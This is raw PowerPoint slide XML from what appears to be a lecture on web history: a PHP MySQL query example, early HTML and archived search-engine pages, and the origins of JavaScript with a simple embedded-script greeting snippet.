                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if (!$link) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    die('Could not connect: ' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_select_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('example', $link);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  = 'fox';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$query = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, address, age FROM friends </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>='%s' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>lastname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>='%s'", $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>lastname</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$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($query);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if (!$result) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    $message  = 'Invalid query: ' . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>() . "\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    die($message);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>while ($row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>($result)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    echo $row['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    echo $row['address'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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function.mysql-query.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131320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9" end="19"/>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HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original HTML had</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>font sizes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content was static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11883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7 at 8.1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88" y="-1"/>
            <a:ext cx="7440825" cy="5984517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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/web/19961017235908/http://www2.yahoo.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35900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73755" y="0"/>
            <a:ext cx="5967422" cy="5814656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3764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8.26.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365"/>
            <a:ext cx="9144000" cy="5278624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>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/web/19961022174810/http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>www.altavista.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18324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7 at 8.26.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2435"/>
            <a:ext cx="9144000" cy="3266423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851588" y="6107626"/>
            <a:ext cx="7440825" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>web.archive.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/web/19981202230410/http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211631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Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML designed to describe a text document with hyperlinks to other documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to do fancy animations or pretty web pages?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="520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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-Side scripting language for interacting and manipulating HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Created by Brendan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at Netscape Navigator 2.0 in September 1995 as "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LiveScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Renamed to "JavaScript" in December 1995 and is (from the Netscape Press Release)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"announced JavaScript, an open, cross-platform object scripting language for the creation and customization of applications on enterprise networks and the Internet"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript is a (from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) "prototype-based scripting language with dynamic typing and first-class functions"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does this sound like Java?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Questions over why the name change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marketing ploy to capitalize on the "hot" Java language?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collaboration between Sun and Netscape?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By August 1996, Microsoft added support for JavaScript to Internet Explorer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft later changed the name to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to avoid Sun's Java trademark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Submitted to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ecma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> International for standardization on November 1996</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ECMA-262, on June 1997, standardized first version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20750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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lingua franca of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eventually supported by all browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Language organically evolved along the way	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77535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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code can be embedded into HTML pages using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> element and (optionally storing the code in HTML comments)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;!--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> name = prompt('Please enter your name below.', '');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>if (name == null) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('Welcome to my site!');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('Welcome to my site ' + name + '!');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>--&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
